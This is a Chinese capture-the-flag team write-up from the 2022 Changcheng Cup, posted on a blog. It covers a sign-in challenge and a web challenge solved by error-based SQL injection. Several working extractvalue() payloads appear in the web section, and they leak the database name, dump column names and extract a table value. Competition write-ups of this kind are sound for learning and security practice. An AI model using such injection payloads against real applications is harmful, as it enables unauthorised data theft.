2022.8.23 长城杯-花自飘零水自流队writeup

花自飘零水自流战队writeup

一、战队信息

战队名称:花自飘零水自流战队

战队排名:125

战队成员:yuezi2048、zz、stylite 、赤赤

二、解题情况

image.png

三、 解题过程

Misc-签名 签名簿

操作内容

点击提交后得到flag

image.png

flag值

flag{964dd030-d0cc-4387-bc5a-cbdc0773f590}

Web-dj djangogogo

操作内容

进入页面,发现flag in table FLAG,可能存在sql注入

extract,想到extractvalue()函数,即可能存在报错注入。

image.png

修改销售周期为month后 发现存在get传参请求

image.png

尝试引号闭合,发现报错

image.png

结合报错语句,发现from后面存在注入点。

构造payload如下

month FROM extractvalue('ljy666',concat('~',database()))));#

我们将其放入burpsuite中的repeater模块中发送,得到了报错语句如下

image.png

出现ctf数据库名称,表示报错注入可行。

由于一开始给出了表名,我们尝试爆FLAG表中的字段

year FROM extractvalue('ljy666',concat('~',(select group_concat(column_name) from information_schema.columns where table_name='FLAG')))));#

image.png

发现FLAG表中的FLAG字段

接着就可以爆值

构造的payload如下

year FROM extractvalue('ljy666',concat('~',(select mid(FLAG, 1, 30) from FLAG)))));#

image.png

year FROM extractvalue('ljy666',concat('~',(select mid(FLAG, 30, 30) from FLAG)))));#

image.png

拼接在一起后,得到最终的flag

flag值

flag{7d152999-1111-4c27-b734-6ad110a8ad2a}
posted @ 2022-08-23 18:54  yuezi2048  阅读(27)  评论(0编辑  收藏  举报